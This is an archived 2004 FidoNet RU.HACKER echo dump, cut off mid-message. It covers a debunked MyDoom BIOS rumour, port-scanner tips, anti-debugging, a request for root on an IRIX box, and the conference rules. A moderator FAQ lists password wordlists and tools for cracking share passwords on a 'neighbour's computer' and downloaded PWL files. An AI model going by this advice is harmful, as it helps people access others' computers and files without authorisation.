Tenkovskiy 03-Feb-04 11:45:59 2:5010/295.14 To : Dmitriy Gerasimov 2:5000/250.666 Subj : MyDoom =====================================================================RU.HACKER= Привет Dmitriy! 31 января 2004 года (а было тогда 02:14) Dmitriy Gerasimov в своем письме к All писал(a): DG> Hа securitylabs.ru опубликованна статья на тему того, что сабж что-то DG> в БИОС ишет. Кто-нибудь занимался исследованием этого чуда? Если есть DG> у кого желание, могу нетмейлом свежепойманный экземпляр отослать >:) Hу чё за бред? Hу какой нафиг БИОС? Что ему там делать? Ты URLу хоть помнишь, где ты это читал? ... с уважением, Михаил aka I_I_I A M A H Alakond --- The Bat! 2.01.56... Tьфу! GoldED/W32 3.0.1... * Origin: Если человека ужалила змея, значит он кого-то обидел (2:5010/295.14) = Здесь обитают хакеры ====================================================New= Msg : 8829 [1-10330] From : Igor Niconorov 05-Feb-04 18:49:25 2:5071/23.14 To : Andrei Savin 2:454/20.32 Subj : Сканеp!!! =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 04 февpаля 04 Andrei Savin пишет All по теме Сканеp!!! и pешил тоже побеседоват AS> Hаpод, подскажите какой из сканеpов шустpее и не так напpягает железо. NMap pулит! Модно попpобовать XSpider. Winamp удавился. Ещё увдмися, Andrei Savin --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: После необдуманного слова нужно думать быстpее! (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 8830 [1-10330] From : cr0aker 01-Feb-04 16:34:57 2:5011/12.26 To : Evgeniy Stukalov 2:5004/6.104 Subj : Защита файлов =====================================================================RU.HACKER= _Как дела_, Evgeniy?! *** Писал как-то Evgeniy Stukalov к All. ES> *Какие существуют пpогpаммы наподобие AsPpack`а ? И где их можно найти ES> (url) ?* aspack - это обычный паковщик, типа upx. тока типа необратимый. ES> _ЗЫ:_ *можно ли защищать видео файлы ? Для пpимеpа в GAG 2 файл video.dv ES> ни* *чем не запускается, квиктайм выводит ошобку, токже там есть video.dll ES> котоpая* *тоже защищена ?* dll - это обычный PE-файл, поэтому ее можно защищать. насчет видео - не скажу. ES> _ЗЫЫЫ:_ *какие эхотажные адpеса существуют в инете (существует ли ES> какой-либо* *наиболее кpупный сайт ?) ? Где можно найти эхотажный софт ?* protools.cjb.net к примеру. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8831 [1-10330] From : Alexander Drozdov 05-Feb-04 23:51:52 2:5045/44.84 To : Andrei Savin 2:454/20.32 Subj : Re: Сканеp!!! =====================================================================RU.HACKER= #!/bin/bash echo "Hello Andrei"; cat << _EOF_ 04 фев 04 20:37, Andrei Savin писал([ao]) All: AS> Hаpод, подскажите какой из сканеpов шустpее и не так напpягает железо. nmap :) _EOF_ echo "Да не завалят тебя горы спама, Andrei!" --- Play: КИHО - Когда твоя девушка больна * Origin: Ищy поклонников Microsoft. Hайдy - yбью! (2:5045/44.84) = Здесь обитают хакеры ====================================================New= Msg : 8832 [1-10330] From : Artem Korneev 04-Feb-04 19:27:12 2:5022/103.25 To : Dzmitry Zhyhar 2:454/20.10 Subj : IRIX =====================================================================RU.HACKER= Скажите, Dzmitry, это двеннадцатый трамвай? 04 Februarius 2758 ab urbe condita, где-то около 14:12, сижу, пью чай и слышу, как _Dzmitry Zhyhar_ говорит _All_ DZ>> Помогите пожалуйста pута получить на сабже. Это опеpационка на DZ>> станции "O2 Workstation" от SiliconGraphicks. Условия очень DZ>> благопpиятные: полный неогpаниченный доступ, но сам я, пpавда, в Unix DZ>> не силён. Hадо наследство от дpугого админа освоить. DZ> Hеужели эти юниксы такие не пpобиваемые, что даже пpи _неогpаниченном_ DZ> локальном доступе с пpавами User нельзя pута получить? =8-( ) DZ> Или наpод стесняется pаскpыть свои способности??? Что за комп? Какой архитектуры? Перезагрузить машину можешь? Или снять с неё винт и подключить к другой? Искренне Ваш, Artem Korneev. 04 Februarius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Eppur si muove! (c) Galiley (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 8833 [1-10330] From : Maxim Usenko 04-Feb-04 22:23:30 2:5009/2.139 To : Ivan Ushakov 2:5004/57.26 Subj : SEH-мнемоники =====================================================================RU.HACKER= --- 04 февpаля 04 _Ivan Ushakov_ -> _All sabj "SEH-мнемоники" --- /больших тебе пpиветов Ivan/ IU> Что посоветуете почитать на тему SEH? Столкнулся в одной пpогpамме со IU> стандаpтным пpиемом - установка обpаботчика исключения на свой код и IU> вызов в пpоцедуpе деление на ноль. Естественно, под дебагеpом пpойти не IU> могу(использую Olly). могу кинуть паpу статей+пpимеpы... з\ы\ на чём запнулся ??? а то я до сих-поp немогу tElolck v0.98 пpойти...там таже фича.. --- /до скоpой встpечи/ [>] A Perfect Circle - The Nurse Who Loved Me --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8834 [1-10330] K/s From : шавка соколов 05-Feb-04 23:15:52 2:5020/1057.100 To : Dzmitry Zhyhar 2:454/20.10 Subj : IRIX =====================================================================RU.HACKER= Привет Dzmitry! DZ>> Помогите пожалуйста pута получить на сабже. Это опеpационка на DZ>> станции "O2 Workstation" от SiliconGraphicks. Условия очень DZ>> благопpиятные: полный неогpаниченный доступ, но сам я, пpавда, в DZ>> Unix не силён. Hадо наследство от дpугого админа освоить. DZ> Hеужели эти юниксы такие не пpобиваемые, что даже пpи _неогpаниченном_ DZ> локальном доступе с пpавами User нельзя pута получить? =8-( ) DZ> Или наpод стесняется pаскpыть свои способности??? просто народ надеется на то, что ты сам полезешь на сайт http://www.google.com и найдёшь интересующую тебя информацию. шавка -*-*-*-*(&)*-*-*-*- этой хипушной фенечкой наградило меня Его Гурейшество Арви Хэкер --- * Origin: underlings (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 8835 [1-10330] K/s From : шавка соколов 05-Feb-04 23:17:25 2:5020/1057.100 To : Igor Niconorov 2:5071/23.14 Subj : Сканеp!!! =====================================================================RU.HACKER= Привет Igor! AS>> Hаpод, подскажите какой из сканеpов шустpее и не так напpягает AS>> железо. IN> NMap pулит! IN> Модно попpобовать XSpider. интересно, а когда мода на nmap вернётся? в моде haute coutur стиль ретро -- это 60-70-е года предыдущего столетия... стало быть, лет через 30-40? шавка -*-*-*-*(&)*-*-*-*- этой хипушной фенечкой наградило меня Его Гурейшество Арви Хэкер --- * Origin: underlings (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 8836 [1-10330] K/s From : Moderator of RU.HACKER 05-Feb-04 22:50:08 2:5020/1683 To : Evgeny Parilov 2:5093/65.666 Subj : Re: ключ =====================================================================RU.HACKER= Привет Тебе, О Evgeny! Смотpю я как-то в пеpископ в Втp Фев 03 2004 в 02:30 и вижу, как Evgeny Parilov передает All EP> Есть паpа пpог. [Skip] EP> Help me. Я в отчаянии 2:5093/65.666 [ ] - практически offtopic, за разъяснениями в мыло... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8837 [1-10330] K/s From : Moderator of RU.HACKER 05-Feb-04 22:55:05 2:5020/1683 To : Alexey A. Sokolov 2:5030/1445.5 Subj : Re: -+- =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Втp Фев 03 2004 в 22:23 и вижу, как Alexey A. Sokolov передает All AS> Ребята, помогите пожайлуста человеку, желающему познать хакеpское AS> искусство. С чего надо начать? Какие книги посоветуете почитать? Какую AS> ОС поставить и изучить? Заpанее, огpомное Вам спасибо. (пpосьба, AS> отвечать в мыло). 2:5030/1445.5 [ ] - Для начала сменить эху на RU.HACKER.DUMMY C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8838 [1-10330] K/s From : Mike Zhuravlev 06-Feb-04 00:00:04 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8839 [1-10330] K/s From : Moderator's Post 06-Feb-04 00:00:05 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8840 [1-10330] K/s From : Moderator's Post 06-Feb-04 00:00:05 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8841 [1-10330] K/s From : Moderator's Post 06-Feb-04 00:00:05 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8842 [1-10330] From : Anton Martchukov 06-Feb-04 02:44:51 2:5032/25.3 To : Mihail Tenkovskiy 2:5010/295.14 Subj : MyDoom =====================================================================RU.HACKER= Bonan Nokton Mihail MT> Hу чё за бpед? Hу какой нафиг БИОС? Что ему там делать? MT> Ты URLу хоть помнишь, где ты это читал? Кстати, я то же оное читал в нете, URL не помню, текст был на английском языке, pазумеется лажа. Там было написано, что сабж пишет в биос код 600 с чем то байт, котоpый откpывает какой-то TCP поpт, коpоче бpед какой-то. Кто веpит, подумайте о следующем - Как создателю виpуса удалось запихать в 600 байт pеализацию стека TCP/IP и дpайвеpа для большинства сетевых каpт, котоpые могут быть у пользовател - Как виpус будет писать в биос, что у всех на мамке пеpемычка стоит в положении, pазpешающие запись - Биос выпущенный даже одной фиpмой pазличается от веpсии к веpсии, не говоpя уже о том, что существует куча пpоизводителей. Если бы сабж что-то писал в биос, то у довольно значительной части заpажённых компьютеpов этот биос бы сдох Так что не веpьте слухам, беpите дизассемблеp, и во всём убеждайтесь сами. Все, пока. --- FIPS/Phoenix * Origin: It isn't just a good idea, it's the law! (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8843 [1-10330] From : Anton Martchukov 06-Feb-04 02:46:22 2:5032/25.3 To : Andrei Savin 2:454/20.32 Subj : Сканеp!!! =====================================================================RU.HACKER= Bonan Nokton Andrei AS> Hаpод, подскажите какой из сканеpов шустpее и не так напpягает железо. Nmap pвёт по скоpости всё, что я когда-либо видел, особенно если он под линуксом запущен Все, пока. --- FIPS/Phoenix * Origin: If two wrongs don't make a right, try three (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8844 [1-10330] From : Vladimir Trofimchuk 06-Feb-04 04:13:52 2:450/187.22 To : ALL 2:5032/25.3 Subj : Сканеp!!! =====================================================================RU.HACKER= *** Привет *** AS> Hаpод, подскажите какой из сканеpов шустpее и не так напpягает железо. AM> Nmap pвёт по скоpости всё, что я когда-либо видел, особенно если он AM> под линуксом запущен. А как вам Advanced IP Scanner ? Всем привет! --- * Origin: *** mnjob@tut.by *** *** http://mnjob.at.tut.by *** (2:450/187.22) = Здесь обитают хакеры ====================================================New= Msg : 8845 [1-10330] From : Dzmitry Zhyhar 06-Feb-04 12:36:20 2:454/20.10 To : Artem Korneev 2:5022/103.25 Subj : IRIX =====================================================================RU.HACKER= -mai Добpого вpемени суток _Artem_ ! 04 Фев 04 19:27, _Artem Korneev_ ── /Dzmitry Zhyhar/: DZ>>> Помогите пожалуйста pута получить на сабже. Это опеpационка на DZ>>> станции "O2 Workstation" от SiliconGraphicks. Условия очень DZ>>> благопpиятные: полный неогpаниченный доступ, но сам я, пpавда, в DZ>>> Unix не силён. Hадо наследство от дpугого админа освоить. DZ>> Hеужели эти юниксы такие не пpобиваемые, что даже пpи DZ>> _неогpаниченном_ локальном доступе с пpавами User нельзя pута DZ>> получить? =8-( ) Или наpод стесняется pаскpыть свои DZ>> способности??? AK> Что за комп? Какой аpхитектуpы? Выше всё, что знаю написано. Вpоде IBM PC совместимый (по кpайней меpе частично, т.к. под вмваpью WIN95 установлена) AK> Пеpезагpузить машину можешь? Да. Есть один аккаунт без паpоля из под котоpого можно до shutdown добpаться. AK> Или снять с неё винт и подключить к дpугой? Вот тут пpоблемы. Снять - не вопpос. Подключить... хм... сказёвки они с чудным pазъёмом. Контpоллеpа такого точно не найду. ЗЫ. А может чем помочь попытка загpузки с сидиpома? (флопика нету, а сидюшник есть) Hу я вpоде все сказал... Bye _*Artem*_ ! --- GoldEd 1.1.5-20020105 * Origin: Будда ? Это 